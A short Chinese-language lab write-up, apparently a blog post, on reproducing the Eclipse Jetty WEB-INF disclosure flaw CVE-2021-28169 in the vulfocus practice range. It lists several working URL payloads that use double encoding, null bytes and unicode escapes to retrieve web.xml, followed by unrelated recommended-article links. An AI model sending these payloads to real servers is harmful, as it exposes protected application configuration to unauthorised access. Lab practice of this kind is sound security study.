vulfocus 靶场 jetty 敏感信息泄露 (CVE-2021-28169)

对于 <= 9.4.40、<= 10.0.2、<= 11.0.2 的 Eclipse Jetty 版本,对带有双重编码路径的 ConcatServlet 的请求可以访问 WEB-INF 目录中的受保护资源。例如,对 `/concat?/%2557EB-INF/web.xml` 的请求可以检索 web.xml 文件。这可能会泄露有关 Web 应用程序实施的敏感信息。

payload:

http://ip:port后面加如下payload:

static?/%2557Eb-INF/web.xml

/.%00/WEB-INF/web.xml

/%u002e/WEB-INF/web.xml

/a/b/..%00/WEB-INF/web.xml

直接访问:

对W进行编码为 %2557,访问:static?/%2557EB-INF/web.xml

相关推荐
Bonnie_12158 天前
11-netty基础-手写rpc-支持多序列化协议-03
网络·网络协议·rpc·jetty
Bonnie_12158 天前
13-netty基础-手写rpc-消费方生成代理-05
网络·网络协议·rpc·jetty
Bonnie_121519 天前
04-netty基础-Reactor三种模型
java·nio·jetty
IT布道20 天前
解决angular与jetty websocket 每30s自动断连的问题
websocket·angular.js·jetty
Bonnie_121524 天前
02-netty基础-java四种IO模型
java·开发语言·nio·jetty
太阳伞下的阿呆1 个月前
Tomcat/Jetty/Undertow对比
tomcat·nio·jetty·aio·undertow
ladymorgana1 个月前
【Spring boot】tomcat Jetty Undertow对比,以及应用场景
spring boot·tomcat·jetty
我只有一岁半2 个月前
Tomcat Jetty 和 UnderTow 的粗略对比
tomcat·jetty
开开心心就好3 个月前
高效全能PDF工具,支持OCR识别
java·前端·python·pdf·ocr·maven·jetty
飒飒的宇y8 个月前
【Java Nio Netty】基于TCP的简单Netty自定义协议实现(万字,全篇例子)
java·后端·websocket·tcp/ip·jetty